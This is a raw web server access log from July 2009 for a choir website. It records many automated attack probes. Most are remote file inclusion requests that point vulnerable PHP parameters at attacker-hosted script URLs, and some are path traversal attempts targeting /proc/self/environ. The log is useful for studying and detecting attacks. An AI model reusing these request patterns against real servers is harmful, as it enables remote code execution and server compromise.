85.158.185.67 - - [04/Jul/2009:07:34:49 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:34:50 -0700] "GET /logs/access.log/errors.php?error=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:34:50 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:34:51 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:35:03 -0700] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:35:03 -0700] "GET /logs/access_090528.log%20%20/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:35:03 -0700] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:07:35:08 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:11 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:11 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:12 -0700] "GET /errors.php?error=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:12 -0700] "GET /logs/errors.php?error=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:13 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:13 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:13 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:35:13 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
72.30.79.34 - - [04/Jul/2009:07:35:41 -0700] "GET /xxxx/?M=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:36:12 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:36:19 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:36:21 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:32 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:32 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:36:42 -0700] "GET /logs/access.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:36:42 -0700] "GET /?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:36:42 -0700] "GET /logs/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:47 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:47 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:36:47 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:37:10 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:07:37:23 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:38:15 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:38:17 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:38:18 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:38:27 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:38:38 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /logs/access.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /logs/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:39:33 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:39:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:39:33 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:39:36 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:39:56 -0700] "GET /logs/access_090612.log%20%20/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:40:22 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:41:24 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:43:19 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.97.206.137 - - [04/Jul/2009:07:43:57 -0700] "GET /logs/access_090622.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:44:41 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:44:41 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:44:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:44:51 -0700] "GET /logs/access.log/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:46:20 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:07:46:52 -0700] "GET /logs/access.log/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:46:54 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:47:56 -0700] "GET /logs/access_090626.log//skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:47:56 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:47:56 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:48:05 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:48:05 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:07:48:05 -0700] "GET /logs/access_090626.log//skin/zero_vote/setup.php?dir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:49:02 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:49:02 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:49:03 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:49:29 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:49:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:07:49:34 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:50:28 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:50:39 -0700] "GET /logs/access_090612.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:50:40 -0700] "GET /logs/access_090612.log/errors.php?error=http://www.hoteldaifa.com.br/port/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:50:41 -0700] "GET /logs/access_090612.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:07:50:41 -0700] "GET /logs/access_090612.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:07:50:52 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:51:26 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:51:26 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:51:26 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:07:52:43 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:53:18 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:54:18 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:54:18 -0700] "GET /logs/access_090528.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:07:54:18 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1224 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:54:23 -0700] "GET /logs/access_090626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:54:33 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:54:38 -0700] "GET /logs/access_090603.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:54:38 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:54:38 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:54:51 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:54:51 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:07:54:51 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:55:02 -0700] "GET /logs/access_090626.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:56:10 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:56:10 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:56:32 -0700] "GET /logs/access_090612.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:56:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:56:32 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:07:56:41 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:56:57 -0700] "GET /logs/access_090626.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:57:51 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.106.249.217 - - [04/Jul/2009:07:57:51 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
65.55.106.244 - - [04/Jul/2009:07:58:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:07:59:43 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:07:59:43 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:07:59:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:07:59:44 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:00:53 -0700] "GET /logs/access_090626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:08:01:10 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:01:17 -0700] "GET /logs/access_090603.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:01:17 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:01:18 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:02:38 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:03:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:03:09 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:03:09 -0700] "GET /logs/access_090603.log//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:03:40 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:08:03:49 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
